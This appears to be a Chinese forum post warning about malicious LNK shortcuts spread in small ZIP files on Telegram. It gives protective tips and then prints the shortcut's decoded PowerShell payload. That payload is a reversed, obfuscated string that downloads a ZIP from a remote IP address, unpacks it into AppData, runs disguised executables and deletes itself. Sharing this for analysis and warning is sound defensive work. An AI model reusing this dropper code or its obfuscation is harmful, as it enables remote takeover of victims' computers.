近期telegram有人大肆传播lnk病毒
文件特征如下描述
一个zip压缩包,名字任意。但是压缩包非常小,小于10KB。
点开后里面是lnk文件,该文件为Windows平台专用,本质上是可执行任意指令的快捷方式。点击后你的电脑会变成肉鸡,入侵者可随意远程控制你的电脑。
所以遇到体积过小的压缩包,你又在使用Windows平台的话,请务必不要打开!推荐去把Windows的隐藏已知后缀取消,不要点击陌生lnk文件。
同时,推荐前往Windows telegram客户端关闭自动下载。
通过中标的人把lnk文件分享出来,写的啥?有懂的没?
1、目标执行程序
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2、原始参数(只截取前200字符,太多了)
-NoP -ep Bypass -w h -EncodedCommand JAByAGUAdgAgAD0AIAAnADsAIgBlAHgAZQAuAGQAcwBsAG8AbwB0AG0AdgBcAFwAQwBNAE0AXABcAHQAZgBvAHMAbwByAGMAaQBNAFwAXABBAFQAQQBEAFAAUABBADoAdgBuAGUAJAAiACAAJgA7ACIAZQB…
3、以下是解码后的PowerShell命令
$rev = ';"exe.dslootmv\\CMM\\tfosorciM\\ATADPPA:vne$" &;"exe.tropghc\\CMM\\tfosorciM\\ATADPPA:vne$" &;ecroF- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" metI-evomeR ;ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" htaPnoitanitseD- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" htaP- evihcrA-dnapxE;gnisraPcisaBesU- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" o- "piz.1IJIZ/541.821.221.}BS{$}vv{$}ca{$" lruc;}lluN-tuO|ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" yrotceriD epyT- metI-weN {))"CMM\\tfosorciM\\ATADPPA:vne$" htaP-tseT( ton-( fi ;gnisraPcisaBesU- "txt.明说\\htaPlacol$" o- "txt.明说/541.821.221.}BS{$}vv{$}ca{$" lruc;"431//:"=BS$;"gnisra"=ll$;"Pci"=kk$;"saB"=jj$;"esU-"=hh$;"p"=vv$;"tth"=ca$;"jdh"=jdh$;"juh"=juh$;"jDSh"=ERh$;"ertry"=dsef$;"eeewssy"=ssef$;"eesarreefdssy"=ssgfdf$;"eesacvd"=ssghild$;"teydhs"=DHSTRY$;"tolyghbs"=erfgy$;"dpolls"=fedsaa$;"dujtd"=ADSdRFD$;"sarfvc"=uuuhfb$;"sartrrtkj"=utvvyyyyhnd$;"sarKJHj"=utvvyyyHBnA$;"sarKFHj"=utADHBnA$;"sar"=utA$;"sarK"=utAd$;ecroF- "knl.txt.明说\\htaPlacol$" htaP- metI-evomeR ;htaP.)noitacoL-teG( = htaPlacol$'
$cmm = -join $rev[-1..-$rev.Length]
Invoke-Expression $cmm
4、图标伪装成下列形式
.\1.txt
5、文件描述(可能是垃圾数据)
JMjbdLxqqm1lDDqudandas
6、文件的一些时间信息
- 创建时间 : 2023-06-26 10:13:29.233510+00:00
- 修改时间 : 2023-06-26 10:13:29.233510+00:00
- 访问时间 : 2023-06-26 10:13:29.233510+00:00
7、原始文件大小显示为323584字节
8、分布式链接追踪信息(机器标识等)
- 机器标识符 : TESTMACHINE01234
- Droid卷标识: 0C703587-9D5D-40F3-8021-0578FC96DDFD
- Droid文件标识: D811239A-DCEC-4EF7-B3C9-55B9814E0699



目前共有 5 条回复